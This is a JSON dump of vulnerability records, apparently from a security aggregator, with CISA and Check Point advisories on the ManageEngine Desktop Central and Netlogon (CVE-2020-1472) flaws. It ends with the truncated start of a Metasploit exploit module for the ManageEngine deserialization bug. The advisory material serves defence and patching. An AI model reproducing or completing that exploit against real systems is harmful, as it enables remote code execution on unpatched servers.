survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update on ManageEngine Desktop Central", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T00:00:00", "id": "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:42", "description": "The CERT Coordination Center (CERT/CC) has released information on CVE-2020-1472, a vulnerability affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker could exploit this vulnerability to obtain Active Directory domain administrator access. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the following resources and apply the necessary updates and workaround.\n\n * CERT/CC Vulnerability Note [VU#490028](<https://www.kb.cert.org/vuls/id/490028>)\n * Microsoft\u2019s Security Advisory for [CVE-2020-1472](< https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-17T00:00:00", "type": "cisa", "title": "CERT/CC Releases Information on Critical Vulnerability in Microsoft Windows Netlogon Remote Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-17T00:00:00", "id": "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:41", "description": "The Samba Team has released a security update to address a critical vulnerability\u2014CVE-2020-1472\u2014in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for [CVE-2020-1472](<https://www.samba.org/samba/security/CVE-2020-1472.html>) and apply the necessary updates or workaround.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "cisa", "title": "Samba Releases Security Update for CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CISA:7FB0A467C0EB89B6198A58418B43D50C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "description": "Microsoft has released a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) on cyber threat actors exploiting CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. The Cybersecurity and Infrastructure Security Agency (CISA) has observed nation state activity exploiting this vulnerability. This malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks.\n\nCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes. If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services.\n\nIn the coming weeks and months, administrators should take follow-on actions that are described in [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) released by Microsoft to prepare for the second half of Microsoft\u2019s Netlogon migration process, which is scheduled to conclude in February 2021.\n\nCISA encourages users and administrators to review the following resources and apply the necessary updates and mitigations.\n\n * Microsoft blog post: [Attacks exploiting Netlogon vulnerability (CVE-2020-1472)](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)\n * Microsoft: August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft: [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n * CISA Joint Cybersecurity Advisory: [AA20-283A APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-29T00:00:00", "type": "cisa", "title": "Microsoft Warns of Continued Exploitation of CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-10T00:00:00", "id": "CISA:61F2653EF56231DB3AEC3A9E938133FE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:38:12", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released [Emergency Directive (ED) 20-04](<https://www.cisa.gov/emergency-directive-20-04 >) addressing a critical vulnerability\u2014 CVE-2020-1472\u2014affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker with network access to a domain controller could exploit this vulnerability to compromise all Active Directory identity services.\n\nEarlier this month, [exploit code for this vulnerability was publicly released](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>). Given the nature of the exploit and documented adversary behavior, CISA assumes active exploitation of this vulnerability is occurring in the wild.\n\nED 20-04 applies to Executive Branch departments and agencies; however, CISA strongly recommends state and local governments, the private sector, and others patch this critical vulnerability as soon as possible. Review the following resources for more information:\n\n * [CISA Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability from August 2020 Patch Tuesday](<https://www.cisa.gov/emergency-directive-20-04>)\n * [CERT/CC Vulnerability Note [VU#490028]](<https://www.kb.cert.org/vuls/id/490028>)\n * [Microsoft Security Vulnerability Information for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-18T00:00:00", "type": "cisa", "title": "CISA Releases Emergency Directive on Microsoft Windows Netlogon Remote Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-01-25T00:00:00", "id": "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:39", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of active exploitation of CVE-2020-1472, an [elevation of privilege vulnerability in Microsoft\u2019s Netlogon](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472 >). A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. Applying patches from Microsoft\u2019s August 2020 Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) can prevent exploitation of this vulnerability.\n\nCISA has released a [patch validation script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script >) to detect unpatched Microsoft domain controllers. CISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable. Review the following resources for more information:\n\n * [CISA Patch Validation Script](<https://github.com/cisagov/cyber.dhs.gov/tree/master/assets/report/ed-20-04_script>)\n * [CISA Emergency Directive 20-04: Mitigate Netlogon Elevation of Privilege Vulnerability from August 2020 Patch Tuesday](<https://cyber.dhs.gov/ed/20-04/>)\n * CERT/CC Vulnerability Note [VU#490028](<https://www.kb.cert.org/vuls/id/490028>)\n * Microsoft Security Vulnerability Information for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc >)\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/24/unpatched-domain-controllers-remain-vulnerable-netlogon>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-24T00:00:00", "type": "cisa", "title": "Unpatched Domain Controllers Remain Vulnerable to Netlogon Vulnerability, CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T00:00:00", "id": "CISA:2B970469D89016F563E142BE209443D8", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/24/unpatched-domain-controllers-remain-vulnerable-netlogon", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:40", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available exploit code for CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors. Attackers could exploit this vulnerability to obtain domain administrator access.\n\nCISA encourages users and administrators to review Microsoft\u2019s August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) and [Article](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "cisa", "title": "Exploit for Netlogon Remote Protocol Vulnerability, CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-14T00:00:00", "id": "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "description": "Microsoft addressed a critical remote code execution vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. Beginning with the February 9, 2021 Security Update release, Domain Controllers will be placed in enforcement mode. This will require all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device.\n\nCISA encourages users and administrators to review the Microsoft [security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-10T00:00:00", "type": "cisa", "title": "Microsoft Launches Phase 2 Mitigation for Netlogon Remote Code Execution Vulnerability (CVE-2020-1472) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-10T00:00:00", "id": "CISA:E5A33B5356175BB63C2EFA605346F8C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:40:23", "description": "A remote code execution vulnerability exists in Zoho ManageEngine Desktop Central. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-08T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Remote Code Execution (CVE-2020-10189)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-08T00:00:00", "id": "CPAI-2020-0118", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:19:47", "description": "A file disclosure vulnerability exists in Pulse Connect Secure. Successful exploitation of this vulnerability would allow a remote attacker to list directories on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-09-04T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure File Disclosure (CVE-2019-11510)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-09-04T00:00:00", "id": "CPAI-2019-1097", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:36:41", "description": "A privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-04T00:00:00", "type": "checkpoint_advisories", "title": "Winlogon Privilege Escalation (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-06T00:00:00", "id": "CPAI-2020-1095", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:37:50", "description": "An elevation of privilege vulnerability exists in Microsoft Netlogon. Successful exploitation of this vulnerability could allow an attacker to run arbitrary code with elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Netlogon Elevation of Privilege (CVE-2020-1472)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2020-0872", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2020-03-14T22:50:18", "description": "", "cvss3": {}, "published": "2020-03-14T00:00:00", "type": "packetstorm", "title": "ManageEngine Desktop Central Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-14T00:00:00", "id": "PACKETSTORM:156730", "href": "https://packetstormsecurity.com/files/156730/ManageEngine-Desktop-Central-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine Desktop Central Java Deserialization', \n'Description' => %q{ \nThis module exploits a Java deserialization vulnerability in the \ngetChartImage() method from the FileStorage class within ManageEngine \nDesktop Central versions < 10.0.474. Tested against 10.0.465 x64. \n \n\"The short-term fix for the arbitrary file upload vulnerability was \nreleased in build 10.0.474 